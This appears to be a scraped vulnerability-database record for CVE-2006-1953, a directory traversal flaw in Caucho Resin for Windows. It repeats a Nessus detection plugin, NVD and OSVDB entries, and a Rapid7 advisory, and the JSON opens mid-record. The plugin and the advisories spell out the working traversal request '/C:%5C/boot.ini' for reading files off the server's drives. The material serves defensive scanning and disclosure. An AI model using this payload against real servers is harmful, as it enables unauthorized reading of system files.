2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-02T00:03:11"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 4, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "4bced821870bec24410903d105de44cda06661fe3c30fed576650d015fe10a5a", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "9570f8e4e9af170494f007d8a35f0a26", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "13dd5af15e7bb84751f8448055a796c1", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-08-30T19:53:26", "modified": "2018-07-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:53:26"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec"}, {"key": "cvelist", "hash": "6f10b73f4afe1b28494745550233b016"}, {"key": "cvss", "hash": "313104e31e57b9f7aa405f5f0fc56a4e"}, {"key": "description", "hash": "fcbb223297efb9c25944b85dbf4f0c52"}, {"key": "href", "hash": "8969ce418fdd25af1ed884467625a5ca"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07a0416e4de2a26a0531240b230d9eca"}, {"key": "pluginID", "hash": "878579eaa9f4f2a252e909b75890c924"}, {"key": "published", "hash": "05304142f12617fe4e16be3bc21e8470"}, {"key": "references", "hash": "79a3d069e1f4328741af17d3fccf32cd"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "8e42d3c54b9b50456eedee858f471fbf"}, {"key": "title", "hash": "1815f28d0d26a69f69e9aa346cfb841d"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "9bcc763acfe7adc5374758c4b5015265b77a7e2a59a39bf72a2dd46fba7beafe", "viewCount": 1, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1953"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:46471"]}, {"type": "osvdb", "idList": ["OSVDB:25570"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:12706"]}], "modified": "2019-01-16T20:06:38"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "naslFamily": "Web Servers", "pluginID": "21606", "cpe": ["cpe:/a:caucho:resin"]}

{"cve": [{"lastseen": "2018-10-19T11:35:58", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Caucho Resin 3.0.17 and 3.0.18 for Windows allows remote attackers to read arbitrary files via a \"C:%5C\" (encoded drive letter) in a URL.", "modified": "2018-10-18T12:37:21", "published": "2006-05-17T06:06:00", "id": "CVE-2006-1953", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1953", "title": "CVE-2006-1953", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:34", "bulletinFamily": "exploit", "description": "", "modified": "2006-05-22T00:00:00", "published": "2006-05-22T00:00:00", "href": "https://packetstormsecurity.com/files/46471/Rapid7-Security-Advisory-24.html", "id": "PACKETSTORM:46471", "type": "packetstorm", "title": "Rapid7 Security Advisory 24", "sourceData": "`_______________________________________________________________________ \nRapid7 Security Advisory \nVisit http://www.rapid7.com/ to download NeXpose, \nSC Magazine Winner of Best Vulnerability Management product. \n_______________________________________________________________________ \n \nRapid7 Advisory R7-0024 \nCaucho Resin Windows Directory Traversal Vulnerability \n \nPublished: May 16, 2006 \nRevision: 1.0 \nhttp://www.rapid7.com/advisories/R7-0024.html \n \nCVE: CVE-2006-1953 \n \n1. Affected system(s): \n \nKNOWN VULNERABLE: \no Caucho Resin v3.0.18 for Windows \no Caucho Resin v3.0.17 for Windows \n \nNOT VULNERABLE: \no Caucho Resin v3.0.19 \no Caucho Resin v3.0.16 and earlier \n \n2. Summary \n \nThe Caucho Resin web application server for Windows contains a \ndirectory traversal vulnerability that allows remote \nunauthenticated users to download any file from the system. It is \npossible to download files from any drive on the system. \n \nRapid7 have updated NeXpose to check for this vulnerability. Licensed \ncustomers will receive the new vulnerability checks automatically. \nVisit http://www.rapid7.com to register for a free demo of NeXpose. \n \n3. Vendor status and information \n \nCaucho Technology, Inc. \nhttp://www.caucho.com/ \n \nCaucho was notified of this vulnerability on April 20th, 2006. \nThey fixed this vulnerability in the latest unofficial snapshot \nof Resin 3.0.19, available from Caucho's website. \n \n4. Solution \n \nUpgrade to the latest snapshot version of Resin, version 3.0.19. \n \n5. Detailed analysis \n \nCaucho Resin is a servlet and JSP server. Resin ships with its own \nstandalone web server which runs by default on port 8080. Any remote \nuser can request URLs of the form: \n \nhttp://victim:8080/C:%5C/ \n \nto access the root of the C: drive (and any files below it). Any \ndrive letter can be specified. Only Resin on Windows is vulnerable. \n \nThis vulnerability appears to have been introduced in Resin \nversion 3.0.17, although this has not been confirmed by the vendor. \n \n6. Contact Information \n \nRapid7 Security Advisories \nEmail: advisory@rapid7.com \nWeb: http://www.rapid7.com/ \nPhone: +1 (617) 603-0700 \n \n7. Disclaimer and Copyright \n \nRapid7, LLC is not responsible for the misuse of the information \nprovided in our security advisories. These advisories are a service \nto the professional security community. There are NO WARRANTIES \nwith regard to this information. Any application or distribution of \nthis information constitutes acceptance AS IS, at the user's own \nrisk. This information is subject to change without notice. \n \nThis advisory Copyright (C) 2006 Rapid7, LLC. Permission is \nhereby granted to redistribute this advisory, providing that no \nchanges are made and that the copyright notices and disclaimers \nremain intact. \n \n`\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/46471/R7-0024.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Vulnerability Description\nCaucho Resin contains a flaw that allows a remote attacker to disclose the content of arbitrary files outside of the web path. The issue is due to an input validation error when processing specially crafted HTTP requests containing the \"%5C\" sequence.\n## Solution Description\nUpgrade to version 3.0.19 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCaucho Resin contains a flaw that allows a remote attacker to disclose the content of arbitrary files outside of the web path. The issue is due to an input validation error when processing specially crafted HTTP requests containing the \"%5C\" sequence.\n## Manual Testing Notes\nhttp://[target]:8080/C:%5C/\n## References:\nVendor URL: http://www.caucho.com/resin/index.xtp\n[Secunia Advisory ID:20125](https://secuniaresearch.flexerasoftware.com/advisories/20125/)\n[Related OSVDB ID: 25571](https://vulners.com/osvdb/OSVDB:25571)\nOther Advisory URL: http://www.rapid7.com/advisories/R7-0024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0385.html\nKeyword: R7-0024\nISS X-Force ID: 26478\nFrSIRT Advisory: ADV-2006-1831\n[CVE-2006-1953](https://vulners.com/cve/CVE-2006-1953)\nBugtraq ID: 18005\n", "modified": "2006-05-16T07:17:34", "published": "2006-05-16T07:17:34", "href": "https://vulners.com/osvdb/OSVDB:25570", "id": "OSVDB:25570", "title": "Caucho Resin Encoded Path Request Arbitrary File Access", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", "description": "_______________________________________________________________________\r\n Rapid7 Security Advisory\r\n Visit http://www.rapid7.com/ to download NeXpose,\r\n SC Magazine Winner of Best Vulnerability Management product.\r\n_______________________________________________________________________\r\n\r\nRapid7 Advisory R7-0024\r\nCaucho Resin Windows Directory Traversal Vulnerability\r\n\r\n Published: May 16, 2006\r\n Revision: 1.0\r\n http://www.rapid7.com/advisories/R7-0024.html\r\n\r\n CVE: CVE-2006-1953\r\n\r\n1. Affected system(s):\r\n\r\n KNOWN VULNERABLE:\r\n o Caucho Resin v3.0.18 for Windows\r\n o Caucho Resin v3.0.17 for Windows\r\n\r\n NOT VULNERABLE:\r\n o Caucho Resin v3.0.19\r\n o Caucho Resin v3.0.16 and earlier\r\n\r\n2. Summary\r\n\r\n The Caucho Resin web application server for Windows contains a\r\n directory traversal vulnerability that allows remote\r\n unauthenticated users to download any file from the system. It is\r\n possible to download files from any drive on the system.\r\n\r\n Rapid7 have updated NeXpose to check for this vulnerability. Licensed\r\n customers will receive the new vulnerability checks automatically.\r\n Visit http://www.rapid7.com to register for a free demo of NeXpose.\r\n\r\n3. Vendor status and information\r\n\r\n Caucho Technology, Inc.\r\n http://www.caucho.com/\r\n\r\n Caucho was notified of this vulnerability on April 20th, 2006.\r\n They fixed this vulnerability in the latest unofficial snapshot\r\n of Resin 3.0.19, available from Caucho's website.\r\n\r\n4. Solution\r\n\r\n Upgrade to the latest snapshot version of Resin, version 3.0.19.\r\n\r\n5. Detailed analysis\r\n\r\n Caucho Resin is a servlet and JSP server. Resin ships with its own\r\n standalone web server which runs by default on port 8080. Any remote\r\n user can request URLs of the form:\r\n\r\n http://victim:8080/C:%5C/\r\n\r\n to access the root of the C: drive (and any files below it). Any\r\n drive letter can be specified. Only Resin on Windows is vulnerable.\r\n\r\n This vulnerability appears to have been introduced in Resin\r\n version 3.0.17, although this has not been confirmed by the vendor.\r\n\r\n6. Contact Information\r\n\r\n Rapid7 Security Advisories\r\n Email: advisory@rapid7.com\r\n Web: http://www.rapid7.com/\r\n Phone: +1 (617) 603-0700\r\n\r\n7. Disclaimer and Copyright\r\n\r\n Rapid7, LLC is not responsible for the misuse of the information\r\n provided in our security advisories. These advisories are a service\r\n to the professional security community. There are NO WARRANTIES\r\n with regard to this information. Any application or distribution of\r\n this information constitutes acceptance AS IS, at the user's own\r\n risk. This information is subject to change without notice.\r\n\r\n This advisory Copyright (C) 2006 Rapid7, LLC. Permission is\r\n hereby granted to redistribute this advisory, providing that no\r\n changes are made and that the copyright notices and disclaimers\r\n remain intact.\r\n", "modified": "2006-05-17T00:00:00", "published": "2006-05-17T00:00:00", "id": "SECURITYVULNS:DOC:12706", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12706", "title": "Caucho Resin Windows Directory Traversal Vulnerability", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}]}

Resin for Windows Encoded URI Traversal Arbitrary File Access

Description

The remote host is running Resin, an application server. The installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.

The remote host is running Resin, an application server.

The installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.